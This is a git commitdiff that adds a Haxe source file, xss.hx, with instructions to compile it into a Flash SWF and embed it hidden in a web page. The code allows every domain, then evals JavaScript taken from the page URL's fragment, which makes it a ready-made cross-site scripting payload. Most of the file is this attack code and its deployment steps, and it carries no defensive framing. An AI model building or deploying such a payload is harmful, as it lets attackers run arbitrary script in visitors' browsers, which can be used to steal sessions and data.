--- /dev/null
+// xss.hx
+//
+// Purpose:
+// This haxe source file builds a SWF which injects JavaScript into the including page.
+//
+// To build:
+// 1. Acquire the latest stable version of haxe from http://haxe.org/download
+// Note: To run haxe, you may also need Neko (http://nekovm.org/download)
+// 2. Create a file called xss.hx with these contents.
+// 3. Create a file called compile.hxml with the following content:
+// -swf-version 9
+// -swf xss.swf
+// -main xss
+// 4. From the command line, execute:
+// haxe compile.hxml
+//
+// To activate:
+// 1. Take xss.swf generated by haxe and deploy it to your webserver.
+// 2. Embed it into your HTML file with code like the following:
+// <object
+// id="xss" class="hidden"
+// classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
+// codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
+// <param name="movie" value="xss.swf" />
+// <param name="allowScriptAccess" value="always" />
+// <embed
+// class="hidden"
+// src="xss.swf"
+// allowScriptAccess="always"
+// type="application/x-shockwave-flash"
+// pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">
+// </embed>
+// </object>
+//
+
+import flash.external.ExternalInterface;
+
+class Xss {
+
+ public static function main() {
+ flash.system.Security.allowDomain("*");
+ ExternalInterface.call( [ "(function(){setTimeout(\"",
+ "eval(document.location.hash.slice(1))",
+ "\",0);})" ].join('') );
+ }
+
+}
projects / flashxss.git / commitdiff